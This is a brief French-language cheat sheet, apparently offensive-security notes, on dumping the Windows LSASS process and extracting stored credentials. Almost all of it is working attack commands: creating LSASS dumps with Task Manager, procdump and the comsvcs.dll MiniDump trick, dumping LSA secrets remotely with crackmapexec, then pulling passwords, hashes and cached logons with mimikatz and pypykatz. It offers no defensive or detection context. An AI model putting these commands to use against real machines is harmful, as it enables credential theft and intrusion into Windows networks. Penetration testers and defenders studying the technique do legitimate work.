Dump LSASS et extraction de secrets
DUMP de LSASS
Localement
Génération d'un dump via le gestionnaire de tâches
Bouton droit sur le processus > Créer un fichier dump
Le fichier est créé dans le dossier %TEMP%
Via Procdump.exe (sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Rundll32.exe & Comsvcs.dll
- Trouver le pid de lsass :
tasklist /svc
Get-Process lsass
- Créer le dump (pid = 672) :
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
A distance
crackmapexec smb $TARGET_IP --local-auth -u $LOCAL_USER -p $LOCAL_PASS --lsa
Extraction d'informations d'identification
# depuis windows dans mimikatz : (ne touche qu'au dump, pas au precessus)
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
# depuis linux
pypykatz lsa minidump /home/peter/Documents/lsass.dmp
Extractions des mots de passe en cache (permettant de se connecter sans connectivité réseau)
lsadump::cache